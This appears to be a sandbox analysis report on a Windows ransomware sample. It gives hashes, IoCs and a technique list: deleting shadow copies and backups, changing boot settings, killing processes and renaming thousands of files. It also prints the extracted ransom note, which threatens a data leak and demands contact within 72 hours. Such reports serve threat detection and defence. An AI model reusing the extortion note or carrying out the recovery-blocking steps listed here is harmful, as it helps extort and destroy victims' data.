96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a

Analysis

max time kernel
118s
max time network
121s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
27-02-2024 17:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
Size

333KB
MD5

57504bca0f333befa73476e449f6a8a0
SHA1

c207f136cda100bb9b319d3276914f697ccb3499
SHA256

96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a
SHA512

cfe9f07fadbf874b9694990c631c8562ad511bbedd7ea91451d80a5c934f4c1036596b0043e441d3078a37cfef6bba818264ef64044606d77657e7a4a0c29bfc
SSDEEP

6144:AemY9cZrt2pF+M9htFl/1M0lpj9G/OaZE8A8otk1:n9cm+M9vFl/1HrN2otk1

Score

10^/10

evasion ransomware

Malware Config

Extracted

Path

C:\MSOCache\All Users\How_to_back_files.html

Ransom Note

<html> <style type="text/css"> body { background-color: #f5f5f5; } h1, h3{ text-align: center; text-transform: uppercase; font-weight: normal; } /*---*/ .tabs1{ display: block; margin: auto; } .tabs1 .head{ text-align: center; float: top; padding: 0px; text-transform: uppercase; font-weight: normal; display: block; background: #81bef7; color: #DF0101; font-size: 30px; } .tabs1 .identi { font-size: 10px; text-align: center; float: top; padding: 15px; display: block; background: #81bef7; color: #DFDFDF; word-break: break-all; } .tabs .content { background: #f5f5f5; /*text-align: center;*/ color: #000000; padding: 25px 15px; font-size: 15px; font-weight: 400; line-height: 20px; } .tabs .content a { color: #df0130; font-size: 23px; font-style: italic; text-decoration: none; line-height: 35px; } .tabs .content .text{ padding: 25px; line-height: 1.2; } </style> <body> <div class="tabs1"> <div class="head" ><b>Your personal ID:</b></div> <div class="identi"> <span style="width:1000px; color: #ffffff; font-size: 10px;">kSp93u67Aj0pxHQfP9ddm/xlFHuZV8T2Bs9kzsaD06+NNVhoaj7H+nw1YAM+0KyDaaV44V7R+A+dMXJXPKKVAM45jls60+7ytsTHffqAPkK/fPSaAl2jePXeMk3grmxNMHMDDCdmkodig+owml26eOzVacciXFhG6IDrUV0SWWKJ3GFJabfUvbgCCD34upPj3uFYB9qj7XjNH5QpSZBjeBg80gU6wE2UakmXAbIadG21HzgKmcjCzpgJq0DtZu5J8nRE3jNwiBzoNpfs3tUKrwIjAnQbEUC5zp9AyjT3Up1qRUJ33SbXgakmk+nXYih1iScJ1bIlSOfD/VPQtCRgy6+bJkiyFnoraDCepA+syow6lRywapwgPCto78qUV1ocIdBnqiB6S/E+YJBjQvCp5Vu0oUt0TmSYHdVvg/2hiT6xBQd9ndEj90+VJCNZ1QJb2hgbTXHukguIciJSxnmw1T5o8xsivOALwhmh9gPnpzkIUy76e8mRZUwjDO0mUfIJPAcsplmhek6e/AcAsg5SPmAiK/Lak3RGaxq5lGigdWrli1p4NWSm2s9Z7sG+JmZQdF/jta3pjmbhDN1eX7a5OhB0WQJxt9JdXWEype/rHPkK9/nme2hj0hUq8v+jCF1Z2QzH2sc/5JxLLLo8PGxJ+RpzlodRTuwCZb0pcUHYb22VZZtevTRoFSpBLMftkqIVJj0uyWeqhUtj9KdFnQu8kyiZrR8nWJYC9TatYdet6+UROIMMahbCqiIv+ut2Y8REu2MTYm+guxYsNoeR2fDNXmb1PU2kB52ZD2ptMsZFPgkjz9co8H8g3csI1q3vQkGuofvFw6l7MmA35zOauUUM/NqcN0E5ySiNXsPaRc1IvIlJAbzVvgdEjc4vQiF3d0DbRuLybP4qL2siQyfcyHldDE47o+Ice+hNT9K+uGL1CSFz7anfzPnWgQuFhzqeTN7yFj3ZuPOww2Pr9ufPmqJOezu9RDVCqDhVixxzF4cSMa7pwy19YDsAcNH3I1zfZDHajlRn1NeJZbJ7h0ftGxU6VawlxRHpNg3AynshXyKVdYq83QkNKL5ddcfpQn9b/BZoRaD8MNndhvINqklQ9IfzUieAkjKyjrJIhsOV5Vuju5l3ejzq6iK/Khxp8SbB+t6frwS7uiQ34RpngKHViIPH2DEJt+poBXyl6hJsy8omMVD1URCeHQtazMghspu+i7/XDkHGulhcf/MxdXioDL4eT1jYOiMBU3Uz89xyo25RWxdfklXo8RAwfyg0Ggc10wL9dP8L9M4JEpFNYseMFcFuW9fcok6hU886TL6PZl/KllHqkpBh6aGs8aRwVyxO7Ohzms7rchelrqzapqNAN9QrDf8O1od74k7zwythNjw9ar+Eri3iQJ53PnZKzXykENVfLc6ZIOzaw2Lqtn9BfGpAShsj5um6nQ6H/PvO/yQyWtta8YX9wluQj8r6nb4/S/dMMFq20wvYeu4gYsmp6/M5TgJWkvBXyIcfTtp0FvA7aETtYb4O31/dUvuiz3wT6KmwJHk2M9Zp1fmraPV0ZSw/nNHM3xpXf9TszXQ7+AYeX5GcvF57NIv72KaRGavzSFXELxtdbGc/FM9xwmHSKcfoTfKlPDyVsT2mFJbxg8kXo6I46uzynpkKxUoLI94uu39Bh9BeDAcUs+CCflbvPmDS1KCY6dHl8K8UeRTcwWpF2Ec=</span> <br>  </div> </div>  <div class="tabs">  <div class="tab"> <div id="tab-content1" class="content"> <div class="text">  <b>/!\ YOUR COMPANY NETWORK HAS BEEN PENETRATED /!\</b><br> <b>All your important files have been encrypted!</b><br><br> <hr> Your files are safe! Only modified. (RSA+AES)<br><br> ANY ATTEMPT TO RESTORE YOUR FILES WITH THIRD-PARTY SOFTWARE<br> WILL PERMANENTLY CORRUPT IT.<br> DO NOT MODIFY ENCRYPTED FILES.<br> DO NOT RENAME ENCRYPTED FILES.<br><br> No software available on internet can help you. We are the only ones able to<br> solve your problem.<br><br> We gathered highly confidential/personal data. These data are currently stored on<br> a private server. This server will be immediately destroyed after your payment.<br> If you decide to not pay, we will release your data to public or re-seller.<br> So you can expect your data to be publicly available in the near future..<br><br> We only seek money and our goal is not to damage your reputation or prevent<br> your business from running.<br><br> You will can send us 2-3 non-important files and we will decrypt it for free<br> to prove we are able to give your files back.<br><br>  <hr> <b>Contact us for price and get decryption software.</b><br><br> <hr> <b>email:</b><br> <a href="[email protected] ">[email protected] </a> <br> <a href="[email protected] ">[email protected] </a> <br> <p>* To contact us, create a new free email account on the site: <a href="https://protonmail.com">protonmail.com <br> <b> IF YOU DON'T CONTACT US WITHIN 72 HOURS, PRICE WILL BE HIGHER.</b><br> <p>* Tor-chat to always be in touch: <a href<a href<b> </div> </div> </div>  <b> <b> <b> <span style="font-size: 22px">qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion</span> </b><br><br> </b><br>  </div> </div>  </div> </div> </body> </html>

Emails

href="[email protected]

">[email protected]

href="[email protected]

">[email protected]

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe

description pid process target process

PID 2256 created 1192 2256 96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe Explorer.EXE
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

1532 bcdedit.exe
2544 bcdedit.exe
Renames multiple (7585) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Deletes System State backups 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command and Scripting Interpreter
T1059

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

2600 wbadmin.exe
Deletes system backups 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command and Scripting Interpreter
T1059

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

896 wbadmin.exe

description	pid	process	target process
PID 2256 created 1192	2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe	Explorer.EXE

pid	process
1532	bcdedit.exe
2544	bcdedit.exe

pid	process
2600	wbadmin.exe

pid	process
896	wbadmin.exe

Enumerates connected drives 3 TTPs 26 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.execipher.execipher.exe

description	ioc	process
File opened (read-only)	\??\Y:	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened (read-only)	\??\O:	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened (read-only)	\??\W:	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened (read-only)	\??\E:	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened (read-only)	\??\G:	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened (read-only)	\??\Q:	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened (read-only)	\??\Z:	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened (read-only)	\??\A:	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened (read-only)	\??\I:	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened (read-only)	\??\J:	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened (read-only)	\??\A:	cipher.exe
File opened (read-only)	\??\B:	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened (read-only)	\??\N:	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened (read-only)	\??\P:	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened (read-only)	\??\T:	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened (read-only)	\??\F:	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened (read-only)	\??\S:	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened (read-only)	\??\V:	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened (read-only)	\??\X:	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened (read-only)	\??\K:	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened (read-only)	\??\L:	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened (read-only)	\??\U:	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened (read-only)	\??\H:	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened (read-only)	\??\M:	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened (read-only)	\??\R:	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened (read-only)	\??\F:	cipher.exe

Drops file in Program Files directory 64 IoCs

Processes:

96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe

description	ioc	process
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Lindeman	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files\Java\jre7\lib\plugin.jar	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Swirl.css	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\Welcome.html	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-options-keymap.jar	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\it-IT\slideShow.html	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15019_.GIF	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Author2XML.XSL	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Rothera	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata_5.5.0.165303.jar	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-util-enumerations.xml	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File created	C:\Program Files\VideoLAN\VLC\lua\meta\reader\How_to_back_files.html	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\misc\How_to_back_files.html	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File created	C:\Program Files\Windows Mail\How_to_back_files.html	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00433_.WMF	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\resources.jar	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Martinique	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annots.api	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0106146.WMF	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\MSOUC_COL.HXC	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files (x86)\Windows Media Player\fr-FR\wmplayer.exe.mui	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-text.xml	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18237_.WMF	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\Things\COUPLER.WAV	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\es-ES\css\settings.css	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-output2_zh_CN.jar	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-progress-ui_ja.jar	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Panama	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Ho_Chi_Minh	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\Person.gif	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\WITHCOMP.DPV	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\launcher.win32.win32.x86_64.properties	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-sampler.xml	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_cloudy.png	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18238_.WMF	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\SETLANG_COL.HXT	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL107.XML	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGSTORYVERT.XML	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Argentina\Tucuman	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\flyout.html	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe\Updater6\AdobeUpdater.cer	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\Ole DB\en-US\oledb32r.dll.mui	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD00234_.WMF	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145669.JPG	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\How_to_back_files.html	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_zh_4.4.0.v20140623020002.jar	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\COPYING.txt	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\css\How_to_back_files.html	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00775_.WMF	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105846.WMF	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107150.WMF	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Newsprint.xml	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\REMOTEL.ICO	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_justify.gif	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring.jar	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File created	C:\Program Files\VideoLAN\VLC\locale\uz\How_to_back_files.html	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files\Windows Media Player\de-DE\wmplayer.exe.mui	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\How_to_back_files.html	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00194_.WMF	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Waveform.xml	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\WCOMP98.POC	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-lib-uihandler_zh_CN.jar	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\TextConv\fr-FR\How_to_back_files.html	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\EVRGREEN\EVRGREEN.ELM	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe

Drops file in Windows directory 3 IoCs

Processes:

wbadmin.exe

description	ioc	process
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl	wbadmin.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

2452 vssadmin.exe

pid	process
2452	vssadmin.exe

Kills process with taskkill 14 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
2524	taskkill.exe
2172	taskkill.exe
1844	taskkill.exe
1028	taskkill.exe
2224	taskkill.exe
2392	taskkill.exe
1764	taskkill.exe
2796	taskkill.exe
2828	taskkill.exe
2296	taskkill.exe
1488	taskkill.exe
576	taskkill.exe
1356	taskkill.exe
2124	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe

pid	process
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
2256	96a1e457593890cfc5535daa37eac9aef9f18442608ee7c14fb2f1ba472b626a.exe
